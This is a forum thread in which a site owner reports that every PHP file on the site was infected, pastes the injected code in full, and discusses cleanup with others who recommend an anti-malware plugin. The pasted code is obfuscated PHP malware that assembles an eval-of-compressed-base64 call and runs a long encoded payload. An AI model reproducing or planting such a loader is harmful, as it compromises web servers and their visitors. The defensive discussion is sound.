I am unlucky because all the php files in my public_html are infected with the following code: <?php $md5 = "59f063d5d1a6b701de0b7628b708f1dd"; $a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s"); $b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]); $b50('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'); ?> PHP: Now I found some articles about this code. http://stackoverflow.com/questions/7307970/cleanup-php-files-from-virus http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html EDIT: If You have mallware on your web hosting and want to remove it please contactme by writing a mail here Thanks
How did you discover that you had the virus? Was your site acting up? I'm curious, so I know what to look for, how to tell if I have it.
I haven't had to remove any malware, yet but this plugin will look for it and it claims to remove the bad code from files where it finds it. Anti-Malware
So I was making a new design a new theme wich is my and I saw the code in my theme wich is made by me.and than I got it.The code wich I gave sends information from my server to the hackers and enough.I liked the article on http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html All wordpress sites when are new this is the first plugin wich I install but nothing.Would be nice to delete the code with one command on ssh.Anyway the best solution is the article wich I said above on the php-beginners.com
Robin for curiosity I reused the plugin wich you said and please look the attached screenshot So the directory is full with that code but this plugin finds only 0 results If you open this article you will see the list of mallware iframes,javascripts and the same code like my but I think that this plugin doesnt have this virus in database
Thx for the info, AlbCoder! Re the plugin not finding the malicious code, is it because the hackers are able to make the code "invisible" to the plugin?
Try posting your results here: http://wordpress.org/support/plugin/gotmls Eli (the plugin author) really cares and responds quickly.